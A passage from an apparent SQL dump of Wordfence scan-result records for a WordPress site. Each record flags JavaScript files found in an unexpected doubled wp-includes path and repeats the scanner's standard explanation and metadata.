More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/nux.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27143,1631424903,1631424903,'new','knownfile',75,'3a2eb4e8a7642ae7d7dd45d6763792ac','44793fb1c5ee99dd95f74867db06bd8d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/plugins.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/plugins.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27144,1631424903,1631424903,'new','knownfile',75,'82a351ed761abd7d2cd1512baa5f5aef','1043f5eee4e0d0806389ac13604b1136','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/plugins.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/plugins.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27145,1631424903,1631424903,'new','knownfile',75,'d65595d2ad50f9ba0f78cc20da410d6e','d9c9f0395c3f10dc505eb2692036e860','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/primitives.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/primitives.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27146,1631424903,1631424903,'new','knownfile',75,'6ca2308769a3361be368a697773d3b14','9dd9bd9b16e14df40b857b72913976be','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/primitives.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/primitives.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27147,1631424903,1631424903,'new','knownfile',75,'30ed3203f79a70192baadfa88681d6b0','c2bb6e960abadf0d24785b8542b45633','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/priority-queue.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/priority-queue.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27148,1631424903,1631424903,'new','knownfile',75,'6be93f906364470ff9bbd0c872d76ac1','35c2aa9cf44f0ed2bf55fd1f84400c5c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/priority-queue.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/priority-queue.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27149,1631424903,1631424903,'new','knownfile',75,'a725f99ecefd222b39c2ebb35609560d','86a82d47263771b99e75b129af3b76b0','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/redux-routine.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/redux-routine.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27150,1631424903,1631424903,'new','knownfile',75,'ea3fdaaadcfed56639be293fcf79a6bb','531b9537f43617ee23a51a05e6f58bae','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/redux-routine.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/redux-routine.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27151,1631424904,1631424904,'new','knownfile',75,'b9f864d97fabf238ca53a5a1eb68db21','a0b46206d2527640fa4d348fbf791b57','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/reusable-blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/reusable-blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27152,1631424904,1631424904,'new','knownfile',75,'94d3fa5682b87747da8b7b1113cf87f6','aba8412861c2fa1e9e53dd6f5f45e13c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/reusable-blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/dist/reusable-blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27153,1631424905,1631424905,'new','knownfile',75,'ecfa77a69858f2fffd35a8d2ca436333','f118670be968714762d073857d01e949','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/rich-text.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/rich-text.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27154,1631424905,1631424905,'new','knownfile',75,'c56953c66c8a194aa0a0fc533af73977','e5d98b82e12377fbe45e10539a09bbdc','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/rich-text.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/rich-text.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27155,1631424905,1631424905,'new','knownfile',75,'1f80a3683c70a74c9907a7918fde463b','d8d834c4031ba8dc4df6a8f1d13b296b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/server-side-render.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/server-side-render.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27156,1631424905,1631424905,'new','knownfile',75,'8bc2b0773ab72469062ab7ebfb7462d7','1228aa1dccb58cbc7d548267e51998aa','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/server-side-render.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/server-side-render.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27157,1631424905,1631424905,'new','knownfile',75,'1747900cc6d163269e6a4a9eb489f2f1','466c2e7753d478ae2e85b0b40c661a73','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/shortcode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/shortcode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27158,1631424905,1631424905,'new','knownfile',75,'4d1bb52d928262a8d807a850caa8252d','428961b0823b9d8d192284e060486cef','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/shortcode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/shortcode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27159,1631424905,1631424905,'new','knownfile',75,'acf888dd1af6ab0c5a169068757ca2b0','f3b65b7e1801b90f9a7f190354d9d932','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/token-list.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/token-list.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27160,1631424905,1631424905,'new','knownfile',75,'88df3943b02c89fd653d6c721d1ae0b6','f625b99eee97c438585285297a02adef','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/token-list.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/token-list.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27161,1631424905,1631424905,'new','knownfile',75,'98c24d7543e1a6ee5fbcec58a3b314af','0a5631e8ddaeda277829e806856f60fc','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/url.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/url.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27162,1631424906,1631424906,'new','knownfile',75,'820dd9beb3ade887ca3632ad0afe21ab','c1b43dc2cba8be83c4f9d88a3def065a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/url.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/url.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27163,1631424906,1631424906,'new','knownfile',75,'accb24144ca9068ce008f7c20458558f','5c87f772944e9997641d4aefe546fdb3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/lodash.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/vendor/lodash.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27164,1631424906,1631424906,'new','knownfile',75,'3437a64dcdf88439b21296ff019111da','6bc072562cf150eda67392d612f84985','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/lodash.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/vendor/lodash.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27165,1631424906,1631424906,'new','knownfile',75,'20487756a201d5438a330743f826e279','d0e0f19b845a624aaaeecc424e2d07c7','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/moment.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/vendor/moment.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27166,1631424906,1631424906,'new','knownfile',75,'ae0b66eceda86ae1c4f123515be60eba','dd818dc1dc7c833ccbb6e1e582e2bbc8','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/moment.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/vendor/moment.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27167,1631424906,1631424906,'new','knownfile',75,'c795c83d80c02209538c17cf6e4efdbe','ab3d66996cd5cc09f6eff2f1a7ade0ce','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react-dom.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/vendor/react-dom.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27168,1631424906,1631424906,'new','knownfile',75,'e1ec2c4fd9880a75b8ae1a47d14f2a53','18acaf138e7ae72aa21f33d1770e5a90','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react-dom.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/vendor/react-dom.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27169,1631424906,1631424906,'new','knownfile',75,'7c122a3127454d01bd43fc8fcacbf196','1eb163254fea1bdf3d10a603ce9a4455','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/vendor/react.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27170,1631424906,1631424906,'new','knownfile',75,'c01701771d708a6b2a0e4e3d2221a607','79fa60886102f4766808b7cbb1110fba','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/vendor/react.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27171,1631424906,1631424906,'new','knownfile',75,'439bfe2fb3fb4ce703d0a75cfa3ab009','15574dbe9793d52999a0f065d019e9ed','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27172,1631424906,1631424906,'new','knownfile',75,'240361aba8d785cd2e733ebee7b86365','6e8588f4c41ef449694fd3ef9c1ab6c1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27173,1631424906,1631424906,'new','knownfile',75,'e86331218f2e0eb0c27dd754115fcef1','572d1a88d99f8d05509eee76464f884a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27174,1631424906,1631424906,'new','knownfile',75,'0b9734b7020af6b7c5c37495a819af31','326013c86c26dd51959fa4c9b562cd39','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27175,1631424906,1631424906,'new','knownfile',75,'19af301438bf8181e415b5be5b47ce6c','b313735d26273b4ac939f613228a9f2d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27176,1631424906,1631424906,'new','knownfile',75,'aa0cc99e4a32712121847d87984b9c7d','207db7f8eae034768d6d2a3332812fbb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27177,1631424907,1631424907,'new','knownfile',75,'0c6d3252b50468cf84fe71a8817d0f0b','98737686196abea510bc9009f4ebae36','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27178,1631424907,1631424907,'new','knownfile',75,'accf5244b2e052d324c30ad1bea4cc2c','827c92d74a8b0bb3b953501bcc8ba7ad','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27179,1631424907,1631424907,'new','knownfile',75,'6eb4d8c8470471d85571ac91b2db6f41','919ec8df1d6b3cf7931a2be8046430c9','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27180,1631424907,1631424907,'new','knownfile',75,'6295ed7580917ea55b0214d2c0a6ae12','fa77a18e54156e02c3a3709c84ba1fc6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27181,1631424907,1631424907,'new','knownfile',75,'35bfcdde5939c84bb93dabcdad6db9eb','956883e22228063c39401d2cc3cd4271','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 